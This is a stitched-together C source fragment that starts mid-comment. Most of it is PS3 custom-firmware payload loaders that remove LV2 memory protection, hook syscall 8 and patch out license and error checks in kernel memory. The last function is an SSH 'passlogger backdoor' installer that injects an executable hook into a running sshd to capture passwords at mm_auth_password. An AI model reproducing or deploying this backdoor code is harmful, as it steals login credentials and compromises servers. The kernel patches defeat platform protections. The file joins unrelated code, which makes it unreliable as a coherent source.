0x2F830000419E00ACULL pokeq(0x800000000005A6F0ULL, 0x2F83000060000000ULL ); // fix 80010009 error Original: 0x2F830000419E00ACULL */ pokeq(0x800000000005622CULL, 0x386000012F830000ULL ); // ignore LIC.DAT check pokeq(0x80000000002275ECULL, 0x38600000F8690000ULL ); // fix 0x8001002B / 80010017 errors //pokeq(0x8000000000055C58ULL, 0xF821FE917C0802A6ULL ); // just restore the original //pokeq(0x8000000000058E18ULL, 0x419E0038E8610098ULL ); // just restore the original /* BASIC PATCHES SYS36 */ // by 2 anonymous people _poke32(0x565FC, 0x60000000); // PATCH_JUMP(0x56604, 0x5669C); // _poke32(0x5A6E0, 0x60000000); // fix 80010009 error _poke32(0x5A6F4, 0x60000000); // fix 80010019 error _poke( 0x56588, 0x63FF003D60000000); // fix 8001003D error "ori %r31, %r31, 0x3D\n nop\n" done _poke32(0x56650, 0x3BE00000); // fix 8001003E error -- 3.55 ok in 0x055F64 "li %r31, 0" done //Fix 0x8001003C error (incorrect version in sys_load_param) - It is present in the new game updates **/ //_poke(0x267148, 0x386000007C6307B4); // //_poke32(0x267148 + 0x8, 0x4E800020); // /* -002c3cf0 f8 01 00 b0 7c 9c 23 78 7c 7d 1b 78 4b d8 aa 1d |....|.#x|}.xK...| +002c3cf0 f8 01 00 b0 7c 9c 23 78 4b d4 01 88 4b d8 aa 1d |....|.#xK...K...| (openhook jump - 0x3E80) */ PATCH_JUMP(0x297650, (PAYLOAD_OFFSET+0x30)); // patch openhook - done //_poke32(0x29762C, 0xF821FF61); // free openhook Rogero 4.30 (put "stdu %sp, -0xA0(%sp)" instead "b sub_2E9F98") #ifdef CONFIG_USE_SYS8PERMH4 PATCH_JUMP(PERMS_OFFSET, (PAYLOAD_OFFSET+0x18)); #endif }
void load_payload_446(int mode) { //Remove Lv2 memory protection lv1poke(0x370AA8 , 0x0000000000000001ULL); lv1poke(0x370AA8 + 8 , 0xE0D251B556C59F05ULL); lv1poke(0x370AA8 + 16, 0xC232FCAD552C80D7ULL); lv1poke(0x370AA8 + 24, 0x65140CD200000000ULL); install_lv2_memcpy(); /* WARNING!! It supports only payload with a size multiple of 8 */ lv2_memcpy(0x8000000000000000ULL + (u64) PAYLOAD_OFFSET, (u64) payload_sky_446_bin, payload_sky_446_bin_size); lv2_memcpy(0x8000000000000000ULL + (u64) PAYLOAD_UMOUNT_OFFSET, // copy umount routine (u64) umount_446_bin, umount_446_bin_size); restore_syscall8[0]= SYSCALL_BASE + (u64) (SYSCALL_SK1E * 8ULL); // (8*8) restore_syscall8[1]= peekq(restore_syscall8[0]); u64 id[2]; // copy the id id[0]= 0x534B314500000000ULL | (u64) PAYLOAD_OFFSET; id[1] = SYSCALL_BASE + (u64) (SYSCALL_SK1E * 8ULL); // (8*8) lv2_memcpy(0x80000000000004f0ULL, (u64) &id[0], 16); u64 inst8 = peekq(0x8000000000003000ULL); // get TOC lv2_memcpy(0x8000000000000000ULL + (u64) (PAYLOAD_OFFSET + 0x28), (u64) &inst8, 8); inst8 = 0x8000000000000000ULL + (u64) (PAYLOAD_OFFSET + 0x20); // syscall_8_desc - sys8 lv2_memcpy(SYSCALL_BASE + (u64) (SYSCALL_SK1E * 8ULL), (u64) &inst8, 8); usleep(1000); remove_lv2_memcpy(); pokeq(0x80000000007EF000ULL, 0ULL);// BE Emu mount pokeq(0x80000000007EF220ULL, 0ULL); //Patches from webMAN pokeq(0x8000000000297310ULL, 0x4E80002038600000ULL ); // fix 8001003C error pokeq(0x8000000000297318ULL, 0x7C6307B44E800020ULL ); // fix 8001003C error pokeq(0x80000000000560C0ULL, 0x63FF003D60000000ULL ); // fix 8001003D error pokeq(0x8000000000056184ULL, 0x3FE080013BE00000ULL ); // fix 8001003E error pokeq(0x8000000000056130ULL, 0x419E00D860000000ULL ); pokeq(0x8000000000056138ULL, 0x2F84000448000098ULL ); pokeq(0x8000000000059AF4ULL, 0x2F83000060000000ULL ); pokeq(0x8000000000059B08ULL, 0x2F83000060000000ULL ); /* BASIC PATCHES SYS36 */ // by 2 anonymous people _poke32(0x56134, 0x60000000); // done PATCH_JUMP(0x5613C, 0x561D4); // done _poke32(0x059AF8, 0x60000000); // done _poke32(0x059B0C, 0x60000000); // done _poke( 0x0560C0, 0x63FF003D60000000); // fix 8001003D error "ori %r31, %r31, 0x3D\n nop\n" done _poke32(0x056188, 0x3BE00000); // fix 8001003E error -- 3.55 ok in 0x055F64 "li %r31, 0" done PATCH_JUMP(0x5618C, 0x56098); // Not present in rebug, anyway.. /** Rancid-o: Fix 0x8001003C error (incorrect version in sys_load_param) - It is present in the new game updates **/ _poke(0x297314, 0x386000007C6307B4); //done _poke32(0x297314 + 8, 0x4E800020); //done /* -002c3cf0 f8 01 00 b0 7c 9c 23 78 7c 7d 1b 78 4b d8 aa 1d |....|.#x|}.xK...| +002c3cf0 f8 01 00 b0 7c 9c 23 78 4b d4 01 88 4b d8 aa 1d |....|.#xK...K...| (openhook jump - 0x3E80) */ PATCH_JUMP(0x2C47D4, (PAYLOAD_OFFSET+0x30)); // patch openhook - done _poke32(0x2C47B0, 0xF821FF61); // free openhook Rogero 4.30 (put "stdu %sp, -0xA0(%sp)" instead "b sub_2E9F98") _poke(0x2C47B8, 0xFB810080FBA10088ULL); // skip stupid new Rogero patch for ToolBox }:/ (must I restore all LV2 patches to skip this shit?) #ifdef CONFIG_USE_SYS8PERMH4 PATCH_JUMP(PERMS_OFFSET, (PAYLOAD_OFFSET+0x18)); #endif }
void load_payload_460(int mode) { //Remove Lv2 memory protection /* lv1poke(0x370F28, 0x0000000000000001ULL); lv1poke(0x370F28 + 8, 0xE0D251B556C59F05ULL); lv1poke(0x370F28 + 16, 0xC232FCAD552C80D7ULL); lv1poke(0x370F28 + 24, 0x65140CD200000000ULL); */ install_lv2_memcpy(); /* WARNING!! It supports only payload with a size multiple of 8 */ lv2_memcpy(0x8000000000000000ULL + (u64) PAYLOAD_OFFSET, (u64) payload_sky_460_bin, payload_sky_460_bin_size); lv2_memcpy(0x8000000000000000ULL + (u64) PAYLOAD_UMOUNT_OFFSET, // copy umount routine (u64) umount_460_bin, umount_460_bin_size); restore_syscall8[0]= SYSCALL_BASE + 64ULL; // (8*8) restore_syscall8[1]= peekq(restore_syscall8[0]); u64 id[2]; // copy the id id[0]= 0x534B314500000000ULL | (u64) PAYLOAD_OFFSET; id[1] = SYSCALL_BASE + 64ULL; // (8*8) lv2_memcpy(0x80000000000004f0ULL, (u64) &id[0], 16); u64 inst8 = peekq(0x8000000000003000ULL); // get TOC lv2_memcpy(0x8000000000000000ULL + (u64) (PAYLOAD_OFFSET + 0x28), (u64) &inst8, 8); inst8 = 0x8000000000000000ULL + (u64) (PAYLOAD_OFFSET + 0x20); // syscall_8_desc - sys8 lv2_memcpy(SYSCALL_BASE + (u64) (8 * 8), (u64) &inst8, 8); usleep(1000); remove_lv2_memcpy(); pokeq(0x80000000007EF000ULL, 0ULL);// BE Emu mount pokeq(0x80000000007EF220ULL, 0ULL); /* BASIC PATCHES SYS36 */ // by 2 anonymous people _poke32(0x565FC, 0x60000000); // done PATCH_JUMP(0x56604, 0x5669C); // done _poke32(0x05A658, 0x60000000); // done _poke32(0x05A66C, 0x60000000); // done _poke( 0x056588, 0x63FF003D60000000); // fix 8001003D error "ori %r31, %r31, 0x3D\n nop\n" done _poke32(0x056650, 0x3BE00000); // fix 8001003E error -- 3.55 ok in 0x055F64 "li %r31, 0" done PATCH_JUMP(0x56654, 0x56560); // Not present in rebug, anyway.. _poke(0x26FDD8, 0x386000007C6307B4); //done _poke32(0x26FDD8 + 8, 0x4E800020); //done /* -002c3cf0 f8 01 00 b0 7c 9c 23 78 7c 7d 1b 78 4b d8 aa 1d |....|.#x|}.xK...| +002c3cf0 f8 01 00 b0 7c 9c 23 78 4b d4 01 88 4b d8 aa 1d |....|.#xK...K...| (openhook jump - 0x3E80) */ PATCH_JUMP(0x2A02E0, (PAYLOAD_OFFSET+0x30)); // patch openhook - done _poke32(0x2A02BC, 0xF821FF61); // free openhook Rogero 4.30 (put "stdu %sp, -0xA0(%sp)" instead "b sub_2E9F98") #ifdef CONFIG_USE_SYS8PERMH4 PATCH_JUMP(PERMS_OFFSET, (PAYLOAD_OFFSET+0x18)); #endif }
void load_payload_421(int mode) { // Remove LV2 memory protection using LV1_POKE (syscall 9). Maybe unnecessary lv1_pokeq(0x370A28, 0x0000000000000001ULL); lv1_pokeq(0x370A30, 0xe0d251b556c59f05ULL); lv1_pokeq(0x370A38, 0xc232fcad552c80d7ULL); lv1_pokeq(0x370A40, 0x65140cd200000000ULL); install_lv2_memcpy(); /* WARNING!! It supports only payload with a size multiple of 8 */ lv2_memcpy(0x8000000000000000ULL + (u64) PAYLOAD_OFFSET, (u64) payload_sky_421_bin, payload_sky_421_bin_size); lv2_memcpy(0x8000000000000000ULL + (u64) PAYLOAD_UMOUNT_OFFSET, // copy umount routine (u64) umount_421_bin, umount_421_bin_size); restore_syscall8[0]= SYSCALL_BASE + (u64) (SYSCALL_SK1E * 8ULL); // (8*8) restore_syscall8[1]= peekq(restore_syscall8[0]); u64 id[2]; // copy the id id[0]= 0x534B314500000000ULL | (u64) PAYLOAD_OFFSET; id[1] = SYSCALL_BASE + (u64) (SYSCALL_SK1E * 8ULL); // (8*8) lv2_memcpy(0x80000000000004f0ULL, (u64) &id[0], 16); u64 inst8 = peekq(0x8000000000003000ULL); // get TOC lv2_memcpy(0x8000000000000000ULL + (u64) (PAYLOAD_OFFSET + 0x28), (u64) &inst8, 8); inst8 = 0x8000000000000000ULL + (u64) (PAYLOAD_OFFSET + 0x20); // syscall_8_desc - sys8 lv2_memcpy(SYSCALL_BASE + (u64) (SYSCALL_SK1E * 8ULL), (u64) &inst8, 8); usleep(1000); remove_lv2_memcpy(); pokeq(0x80000000007EF000ULL, 0ULL); // BE Emu mount pokeq(0x80000000007EF220ULL, 0ULL); //Patches from webMAN pokeq(0x8000000000296264ULL, 0x4E80002038600000ULL ); pokeq(0x800000000029626CULL, 0x7C6307B44E800020ULL ); // fix 8001003C error pokeq(0x8000000000057020ULL, 0x63FF003D60000000ULL ); // fix 8001003D error pokeq(0x80000000000570E4ULL, 0x3FE080013BE00000ULL ); // fix 8001003E error pokeq(0x8000000000057090ULL, 0x419E00D860000000ULL ); pokeq(0x8000000000057098ULL, 0x2F84000448000098ULL ); pokeq(0x800000000005AA54ULL, 0x2F83000060000000ULL ); // fix 80010009 error pokeq(0x800000000005AA68ULL, 0x2F83000060000000ULL ); // fix 80010019 error /* BASIC PATCHES SYS36 */ // by 2 anonymous people _poke32(0x057094, 0x60000000); // already set in E3 "nop" PATCH_JUMP(0x05709C, 0x57134); // already set in E3 _poke32(0x05AA58, 0x60000000); // already set in E3 "nop" _poke32(0x05AA6C, 0x60000000); // already set in E3 "nop" _poke( 0x057020, 0x63FF003D60000000); // fix 8001003D error "ori %r31, %r31, 0x3D\n nop\n" _poke32(0x0570E8, 0x3BE00000); // fix 8001003E error -- 3.55 ok in 0x055F64 "li %r31, 0" PATCH_JUMP(0x0570EC, 0x56FF8); // fix 4.21 added error /** Rancid-o: Fix 0x8001003C error (incorrect version in sys_load_param) - It is present in the new game updates **/ _poke(0x296268, 0x386000007C6307B4); _poke32(0x296270, 0x4E800020); /* -002c3cf0 f8 01 00 b0 7c 9c 23 78 7c 7d 1b 78 4b d8 aa 1d |....|.#x|}.xK...| +002c3cf0 f8 01 00 b0 7c 9c 23 78 4b d4 01 88 4b d8 aa 1d |....|.#xK...K...| (openhook jump - 0x3E80) */ PATCH_JUMP(0x2C257C, (PAYLOAD_OFFSET+0x30)); // patch openhook #ifdef CONFIG_USE_SYS8PERMH4 PATCH_JUMP(PERMS_OFFSET, (PAYLOAD_OFFSET+0x18)); #endif }
void backdoor_password_install(inject_ctx *ctx) { u32 use_privsep_val=0; u64 use_privsep; u64 *mm_auth_password_calls = NULL; int i, n_mm_auth_password_calls; u64 diff=0, hole_addr=0; u8 *evil_bin; mod_banner("installing passlogger backdoor"); evil_bin = malloc(hook_passlog_bin_len); memcpy(evil_bin, hook_passlog_bin, hook_passlog_bin_len); u64 *import_table = (u64*)(evil_bin + 8); use_privsep = resolve_symbol_tab(ctx, "use_privsep"); if (use_privsep == 0) error("could not locate use_privsep :("); info("use_privsep\t\t= 0x%llx", use_privsep); _peek(ctx->pid, use_privsep, &use_privsep_val, 4); info("use_privsep\t\t= 0x%x", use_privsep_val); if (use_privsep_val == 0) { error("pass logging for PRIVSEP_OFF currently not supported."); } u64 mm_auth_password = sub_by_debugstr(ctx, "%s: waiting for MONITOR_ANS_AUTHPASSWORD"); info("mm_auth_password\t\t= 0x%llx", mm_auth_password); n_mm_auth_password_calls = find_calls(&mm_auth_password_calls, mm_auth_password); if (n_mm_auth_password_calls == 0) error("No calls to mm_auth_password found."); hole_addr = find_hole(ctx, mm_auth_password_calls[0], 0x1000); if (hole_addr == 0) { error("unable to find neighborly hole."); } info("found usable hole @ 0x%lx", hole_addr); _mmap( ctx, (void*)hole_addr, 0x1000, PROT_READ| PROT_WRITE | PROT_EXEC, MAP_ANONYMOUS | MAP_SHARED | MAP_FIXED, 0, 0 ); _peek(ctx->pid, use_privsep, &use_privsep_val, 4); // Patch mm_auth_password for (i = 0; i < n_mm_auth_password_calls; i++) { diff = 0x100000000-(mm_auth_password_calls[i]-hole_addr)-5; info( "building a bridge [0x%lx->0x%lx] .. opcode = [E8 %02X %02X %02X %02X]", mm_auth_password_calls[i], hole_addr, diff & 0xff, (diff>>8)&0xff, (diff>>16)&0xff, (diff>>24)&0xff ); _poke(ctx->pid, mm_auth_password_calls[i]+1, &diff, 4); } import_table[0] = ctx->config_addr; import_table[1] = mm_auth_password; _poke(ctx->pid, hole_addr, evil_bin, hook_passlog_bin_len); free(mm_auth_password_calls); }